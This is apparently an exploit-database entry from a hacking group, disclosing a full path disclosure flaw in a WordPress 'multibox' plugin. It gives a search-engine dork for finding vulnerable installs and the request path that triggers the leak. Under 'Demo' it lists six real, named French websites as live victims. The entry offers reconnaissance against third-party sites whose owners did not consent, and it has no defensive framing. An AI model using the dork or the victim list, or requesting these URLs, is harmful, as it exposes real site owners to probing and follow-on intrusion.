id: 20119
date: 01/08/2013
title: Wordpress multibox plugin Full Path Disclosure vulnerability
author: The Black Devils
cves: 

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm The Black Devils member from Inj3ct0r Team         1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Exploit Title: wordpress multibox plugin Full Path Disclosure vulnerability
# Date: 08/01/2012
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Category : [ webapps ]
# Type : php
# Tested on: [Windows] & [Ubuntu]
# Dork : inurl:"plugins/wordpress-multibox-plugin"
#------------------

http://localhost/wp-content/plugins/wordpress-multibox-plugin/multibox.php

Demo
http://www.agape-architectes.fr/wp-content/plugins/wordpress-multibox-plugin/multibox.php
http://www.landreville.fr/wp-content/plugins/wordpress-multibox-plugin/multibox.php
http://www.college-chaource.fr/wp-content/plugins/wordpress-multibox-plugin/multibox.php
http://www.ot-mussy.fr/lang-fr/wp-content/plugins/wordpress-multibox-plugin/multibox.php
http://www.aikidoisle.fr/wp-content/plugins/wordpress-multibox-plugin/multibox.php
http://www.champagne-lamoureux-vincent.fr/wp-content/plugins/wordpress-multibox-plugin/multibox.php
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------

#  0day.today [2023-03-22]  #